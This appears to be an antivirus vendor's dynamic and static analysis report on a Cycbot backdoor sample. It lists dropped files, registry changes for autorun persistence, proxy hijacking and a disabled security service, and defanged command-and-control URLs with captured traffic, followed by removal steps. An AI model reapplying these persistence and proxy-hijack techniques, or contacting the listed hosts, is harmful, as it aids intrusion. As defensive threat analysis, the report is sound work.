Backdoor.Win32.Cycbot_71c3add065 – Adaware

Dynamic Analysis

Payload

No specific payload has been found.

Process activity

The Backdoor creates the following process(es):

%original file name%.exe:356
Clive Barker - Books Of Blood 03.exe:172
2 Gansta.exe:1372
3R2R.exe:788
3R2R.exe:204
B.tmp:328
ic5.exe:316

The Backdoor injects its code into the following process(es):

3R2R.exe:1728
Explorer.EXE:1644

File activity

The process %original file name%.exe:356 makes changes in the file system.

The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp\2 Gansta.exe (6656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp3.tmp (1009046 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp\3R2R.exe (290816 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp\Clive Barker - Books Of Blood 03.exe (530913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp\ic5.exe (194048 bytes)

The Backdoor deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp\ic5.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp\2 Gansta.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp\Clive Barker - Books Of Blood 03.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp\3R2R.exe (0 bytes)

The process Clive Barker - Books Of Blood 03.exe:172 makes changes in the file system.

The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)

The process 3R2R.exe:1728 makes changes in the file system.

The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\649C6\6249.49C (2301 bytes)
%System%\config\software.LOG (25600 bytes)
%Program Files%\LP\4566\B.tmp (102912 bytes)
%Program Files%\LP\4566\C29.exe (555008 bytes)
%Program Files%\LP\4566\C.exe (1389 bytes)
%System%\config\SOFTWARE (102400 bytes)
%System%\config (28672 bytes)

The Backdoor deletes the following file(s):

%Program Files%\LP\4566\C.exe (0 bytes)

Registry activity

The process %original file name%.exe:356 makes changes in the system registry.

The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "84 E3 13 70 E4 F9 EF 3B 90 C8 E4 A9 ED 92 53 E5"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\test\LOCALS~1\Temp\nsp4.tmp]
"ic5.exe" = "niBluse"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\test\LOCALS~1\Temp\nsp4.tmp]
"2 Gansta.exe" = "2 Gansta"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Ãâ€ÃÂ¾ÃÂºÃ‘Æ’ÃÂ¼ÃÂµÃÂ½Ã‘â€šÃ‘â€¹"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\ÃÂ ÃÂ°ÃÂ±ÃÂ¾Ã‘â€¡ÃÂ¸ÃÂ¹ Ã‘ÂÃ‘â€šÃÂ¾ÃÂ»"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{91167d45-103d-11db-8c91-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d8c0d8da-77bd-11e0-bb02-000c293bc0fd}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\test\LOCALS~1\Temp\nsp4.tmp]
"3R2R.exe" = "3R2R"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{91167d42-103d-11db-8c91-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\ÃÂ ÃÂ°ÃÂ±ÃÂ¾Ã‘â€¡ÃÂ¸ÃÂ¹ Ã‘ÂÃ‘â€šÃÂ¾ÃÂ»"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\test\LOCALS~1\Temp\nsp4.tmp]
"Clive Barker - Books Of Blood 03.exe" = "Clive Barker - Books Of Blood 03"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\ÃÅ“ÃÂ¾ÃÂ¸ ÃÂ´ÃÂ¾ÃÂºÃ‘Æ’ÃÂ¼ÃÂµÃÂ½Ã‘â€šÃ‘â€¹"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{ebcf8d94-66db-11de-b228-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\test\LOCALS~1\Temp\nsp4.tmp\Clive Barker - Books Of Blood 03.exe,"

The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process Clive Barker - Books Of Blood 03.exe:172 makes changes in the system registry.

The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65324"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65324"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{91167d45-103d-11db-8c91-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{91167d42-103d-11db-8c91-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65324"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 2F 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "31 2E 7E 18 C1 A3 8E 8F 7A 23 46 40 8C 32 66 89"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65324"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d8c0d8da-77bd-11e0-bb02-000c293bc0fd}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{ebcf8d94-66db-11de-b228-806d6172696f}]
"BaseClass" = "Drive"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process 2 Gansta.exe:1372 makes changes in the system registry.

The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4D 39 40 93 EF DC 0E 1A 59 2D 3C 1B 9C 1F 47 7C"

The process 3R2R.exe:788 makes changes in the system registry.

The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BB 65 EF A6 31 8D 69 89 F8 2F 7E 06 DB 98 C4 26"

The process 3R2R.exe:204 makes changes in the system registry.

The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "72 60 1F 43 29 C5 D4 3A 5F 91 A0 9C 32 A4 7D 2B"

The process 3R2R.exe:1728 makes changes in the system registry.

The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65324"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 30 00 00 00 03 00 00 00 14 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65324"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer" = "http=127.0.0.1:55192"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65324"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "37 15 F7 31 9E 2F 57 84 02 87 B7 06 CE 23 4A 10"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65324"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "3C 00 00 00 03 00 00 00 03 00 00 00 14 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

To automatically run itself each time Windows is booted, the Backdoor adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"C29.exe" = "%Program Files%\LP\4566\C29.exe"

Automatic startup of the following service is disabled:

[HKLM\System\CurrentControlSet\Services\wscsvc]
"Start" = "3"

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyOverride"

The process B.tmp:328 makes changes in the system registry.

The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A3 F2 E2 0B E2 A0 11 E5 ED 2C 48 49 0D 3B 01 51"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65324"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65324"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65324"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65324"

[HKCU\Software\WinRAR]
"HWID" = "7B 38 43 43 36 35 45 31 46 2D 31 34 45 43 2D 34"

The process ic5.exe:316 makes changes in the system registry.

The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "79 D5 C0 ED 4E D9 0D 64 E5 C7 53 81 30 A7 D9 C9"

Dropped PE files

MD5	File path
8950bca822967c72154e56665ba6f7f2	c:\Documents and Settings\test\Local Settings\Temp\nsp4.tmp\3R2R.exe
f51eba4d54233cfc975dd5d5c4bff62f	c:\Documents and Settings\test\Local Settings\Temp\nsp4.tmp\Clive Barker - Books Of Blood 03.exe
ba4818120b8c3c87a4437450f5968ea5	c:\Program Files\LP\4566\B.tmp
8950bca822967c72154e56665ba6f7f2	c:\Program Files\LP\4566\C29.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

Removals

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:356
Clive Barker - Books Of Blood 03.exe:172
2 Gansta.exe:1372
3R2R.exe:788
3R2R.exe:204
B.tmp:328
ic5.exe:316
Delete the original Backdoor file.
Delete or disinfect the following files created/modified by the Backdoor:
%Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp\2 Gansta.exe (6656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp3.tmp (1009046 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp\3R2R.exe (290816 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp\Clive Barker - Books Of Blood 03.exe (530913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp\ic5.exe (194048 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\649C6\6249.49C (2301 bytes)
%System%\config\software.LOG (25600 bytes)
%Program Files%\LP\4566\B.tmp (102912 bytes)
%Program Files%\LP\4566\C29.exe (555008 bytes)
%Program Files%\LP\4566\C.exe (1389 bytes)
%System%\config\SOFTWARE (102400 bytes)
Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"C29.exe" = "%Program Files%\LP\4566\C29.exe"
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

No information is available.

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
.text	4096	23458	23552	4.5133	2cec663f64ef38694dc96bb9f9cb766d
.rdata	28672	4496	4608	3.58909	db16645055619c0cc73276ff5c3adb75
.data	36864	3774424	1024	3.26654	b9d0aa986d9e766521436f5ad38cd7c5
.ndata	3813376	32768	0	0	d41d8cd98f00b204e9800998ecf8427e
.rsrc	3846144	80464	80896	3.42872	73f86a6245a543a96f576f96c83cda08

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 15
88e9fc280f566e75b54ad356f19bc655
8d362f9ccc6926ac693a660a0af91558
5c2b08b64a1f09f9b988a8bc46a9e630
fcca222aa86ff5586b258e4580f8757e
0016eb10d89c1f2eb9db605eb3a5770e
b2f1f0fc8745c630fb810d6d26b57116
e89791dad855d0639b8c5c31e6fd005e
4b82f8d2fde575a88ca16e77cd0c4c8a
e9d9468da93f92772e13b83aa00b19c2
9a57f10967bea58fcb881af06488fdb9
d31927526523f51d6b3f2f925cd92b9f
3c617aa1780bc50e507331c1a02b19ac
3185a136400f3b49bfc84ac977657be3
a9e3cd512751f30e22028373237b9a27
2b067884974886daf24650507c0ea1c1

Network Activity

URLs

URL	IP
hxxp://classicbattletech.com/lhous3.gif?pr=gwY92w4AcL4x7xCkvoknrnKGYDJULQxy1JhNaygpF7pd5oFfqvgCtiV9uNLuhiEf7TzHhAOUhSlngnyhTvxdyVy9qjsqTfUWh6uEesjLYYVXW1vwRvA/hLJO2LUPIRIgRG7N59HWSUgzFbkWM50wiLD24Nslq+JEx/Bpa9h+3PvFUi7asT24dcH/azc1gv+KrtpgpyaKvRpUrPZEaGug6H+wDDLFSsQ7mXa6OlZDii3pytod8aDviUQSaHigo9ndJG9AxeHv4KBLRDQs7Weu7LksJFILKpq7+C657kM	67.192.254.201
hxxp://rumperstumprs.com/logo.png?tq=gL5HtzoYwLzEpUb5fU3HxcW2B/06EsazybMRtyFZ0umG8Ar0SsSA/gSoSEU=&pr=41	208.73.211.182
hxxp://rumperstumprs.com/logo.png?tq=gHZutHoLpb2HdjbiNAjrpsSCJbO+V98lHA==&pr=41
hxxp://a26.ms.akamai.net/msdownload/update/v3/static/trustedr/en/authrootseq.txt
hxxp://a26.ms.akamai.net/msdownload/update/v3/static/trustedr/en/authrootstl.cab
hxxp://rumperstumprs.com/logo.png?tq=gKZEtzoYwLzEvUb5dQzRsrCqAvQlTca3l74EgC5OjrPGpgfib1XFp5zpRPksUt+A/gSoSEU=&pr=41
www.download.windowsupdate.com	92.123.155.155
ourdatatransfers.com	208.73.211.168
worldorderlive.com	208.73.211.182

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /logo.png?tq=gL5HtzoYwLzEpUb5fU3HxcW2B/06EsazybMRtyFZ0umG8Ar0SsSA/gSoSEU=&pr=41 HTTP/1.0

Host: rumperstumprs.com

User-Agent: mozilla/2.0

Connection: close

HTTP/1.0 200 (OK)

Cache-Control: private, no-cache, must-revalidate

Connection: Keep-Alive

Pragma: no-cache

Server: Oversee Turing v1.0.0

Content-Length: 1397

Content-Type: text/html

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Keep-Alive: timeout=3, max=99

P3P: policyref="hXXp://VVV.dsparking.com/w3c/p3p.xml", CP="NOI DSP COR ADMa OUR NOR STA"

Set-Cookie: parkinglot=1; domain=.rumperstumprs.com; path=/; expires=Sun, 30-Mar-2014 01:55:27 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "hXXp://VVV.w3.org/TR/html4/frameset.dtd">..<html>. <head>. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />.. <title>rumperstumprs.com</title>. <meta name="keywords" content="rumperstumprs.com" />. <meta name="description" content="rumperstumprs.com" />. <meta name="robots" content="index, follow" />. <meta name="revisit-after" content="10" />... <meta name="viewport" content="width=device-width, initial-scale=1.0" /> ... . <script type="text/javascript">. document.cookie = "jsc=1";. </script>.. </head>. <frameset rows="100%,*" frameborder="no" border="0" framespacing="0">. <frame src="hXXp://rumperstumprs.com?epl=Um-PUwFiC-Sjz-PPzH2yLY_DgD6QUDhFchc_PXE0SX41BrMEUsSCNVOIex7BjqqNPGA0EMuVENcd1pL0Qr-p_40CWzjMc9NAHQcK-Gy4kkQXE2dCUaGhmDA5ApZONHkNNTE2LhDKiVM8oXMzGgAamgYNmUQJkN5kgqYeMuonNfJTNWQAIJDer78AAOB_AQAAQIDbCgAAj8OAPllTJllBMTZoWkKbAAAA8A" name="rumperstumprs.com">. </frameset>. <noframes>..<body><a href="hXXp://rumperstumprs.com?epl=Um-PUwFiC-Sjz-PPzH2yLY_DgD6QUDhFchc_PXE0SX41BrMEUsSCNVOIex7BjqqNPGA0EMuVENcd1pL0Qr-p_40CWzjMc9NAHQcK-Gy4kkQXE2dCUaGhmDA5ApZONHkNNTE2LhDKiVM8oXMzGgAamgYNmUQJkN5kgqYeMuonNfJTNWQAIJDer78AAOB_AQAAQIDbCgAAj8OAPllTJllBMTZoWkKbAAAA8A">Click here to go to rumperstumprs.com</a>.</body>. </noframes>.&l

<<

<<< skipped >>>

GET /logo.png?tq=gKZEtzoYwLzEvUb5dQzRsrCqAvQlTca3l74EgC5OjrPGpgfib1XFp5zpRPksUt+A/gSoSEU=&pr=41 HTTP/1.0

Connection: close

Host: rumperstumprs.com

Accept: */*

User-Agent: chrome/9.0

HTTP/1.0 200 (OK)

Cache-Control: private, no-cache, must-revalidate

Connection: Keep-Alive

Pragma: no-cache

Server: Oversee Turing v1.0.0

Content-Length: 1397

Content-Type: text/html

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Keep-Alive: timeout=3, max=87

P3P: policyref="hXXp://VVV.dsparking.com/w3c/p3p.xml", CP="NOI DSP COR ADMa OUR NOR STA"

Set-Cookie: parkinglot=1; domain=.rumperstumprs.com; path=/; expires=Sun, 30-Mar-2014 01:56:03 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "hXXp://VVV.w3.org/TR/html4/frameset.dtd">..<html>. <head>. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />.. <title>rumperstumprs.com</title>. <meta name="keywords" content="rumperstumprs.com" />. <meta name="description" content="rumperstumprs.com" />. <meta name="robots" content="index, follow" />. <meta name="revisit-after" content="10" />... <meta name="viewport" content="width=device-width, initial-scale=1.0" /> ... . <script type="text/javascript">. document.cookie = "jsc=1";. </script>.. </head>. <frameset rows="100%,*" frameborder="no" border="0" framespacing="0">. <frame src="hXXp://rumperstumprs.com?epl=ksIUvJD7ZzYeCCwMRaLwOIA0VBQ3JBROkdzFT08cTZJfjcEsgRSxYM0U4p5HsKNqIw8YDcx6CfP655aeaOwmxc9RiAuGKjnJ7DBYTLvlHZCglnoU4dQOitRZbKRBbB-VEjVDbt3NRKjTM2f3KaUBoKFp0JBJlDCSfoSJYKboUZNNNWQAIJDer78AAOB_AQAAQIDbCgAA0lBR3FlTJllBMTZoWkKbAAAA8A" name="rumperstumprs.com">. </frameset>. <noframes>..<body><a href="hXXp://rumperstumprs.com?epl=ksIUvJD7ZzYeCCwMRaLwOIA0VBQ3JBROkdzFT08cTZJfjcEsgRSxYM0U4p5HsKNqIw8YDcx6CfP655aeaOwmxc9RiAuGKjnJ7DBYTLvlHZCglnoU4dQOitRZbKRBbB-VEjVDbt3NRKjTM2f3KaUBoKFp0JBJlDCSfoSJYKboUZNNNWQAIJDer78AAOB_AQAAQIDbCgAA0lBR3FlTJllBMTZoWkKbAAAA8A">Click here to go to rumperstumprs.com</a>.</body>. </noframes>.&l

<<

<<< skipped >>>

GET /lhous3.gif?pr=gwY92w4AcL4x7xCkvoknrnKGYDJULQxy1JhNaygpF7pd5oFfqvgCtiV9uNLuhiEf7TzHhAOUhSlngnyhTvxdyVy9qjsqTfUWh6uEesjLYYVXW1vwRvA/hLJO2LUPIRIgRG7N59HWSUgzFbkWM50wiLD24Nslq+JEx/Bpa9h+3PvFUi7asT24dcH/azc1gv+KrtpgpyaKvRpUrPZEaGug6H+wDDLFSsQ7mXa6OlZDii3pytod8aDviUQSaHigo9ndJG9AxeHv4KBLRDQs7Weu7LksJFILKpq7+C657kM HTTP/1.0

Connection: close

Host: classicbattletech.com

Accept: */*

User-Agent: chrome/9.0

HTTP/1.1 301 Moved Permanently

Date: Sat, 29 Mar 2014 01:55:23 GMT

Server: Apache

Location: hXXp://bg.battletech.com/lhous3.gif?pr=gwY92w4AcL4x7xCkvoknrnKGYDJULQxy1JhNaygpF7pd5oFfqvgCtiV9uNLuhiEf7TzHhAOUhSlngnyhTvxdyVy9qjsqTfUWh6uEesjLYYVXW1vwRvA/hLJO2LUPIRIgRG7N59HWSUgzFbkWM50wiLD24Nslq+JEx/Bpa9h+3PvFUi7asT24dcH/azc1gv+KrtpgpyaKvRpUrPZEaGug6H+wDDLFSsQ7mXa6OlZDii3pytod8aDviUQSaHigo9ndJG9AxeHv4KBLRDQs7Weu7LksJFILKpq7+C657kM

Content-Length: 629

Connection: close

Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>301 Moved Permanently</title>.</head><body>.<h1>Moved Permanently</h1>.<p>The document has moved <a href="hXXp://bg.battletech.com/lhous3.gif?pr=gwY92w4AcL4x7xCkvoknrnKGYDJULQxy1JhNaygpF7pd5oFfqvgCtiV9uNLuhiEf7TzHhAOUhSlngnyhTvxdyVy9qjsqTfUWh6uEesjLYYVXW1vwRvA/hLJO2LUPIRIgRG7N59HWSUgzFbkWM50wiLD24Nslq+JEx/Bpa9h+3PvFUi7asT24dcH/azc1gv+KrtpgpyaKvRpUrPZEaGug6H+wDDLFSsQ7mXa6OlZDii3pytod8aDviUQSaHigo9ndJG9AxeHv4KBLRDQs7Weu7LksJFILKpq7+C657kM">here</a>.</p>.<hr>.<address>Apache Server at classicbattletech.com Port 80</address>.</body></html>...

GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1

Connection: close

Accept: */*

User-Agent: Microsoft-CryptoAPI/5.131.2600.5512

Host: VVV.download.windowsupdate.com

Pragma: no-cache

HTTP/1.1 200 OK

Content-Type: application/octet-stream

Last-Modified: Wed, 12 Mar 2014 20:20:10 GMT

Accept-Ranges: bytes

ETag: "0b96c77303ecf1:0"

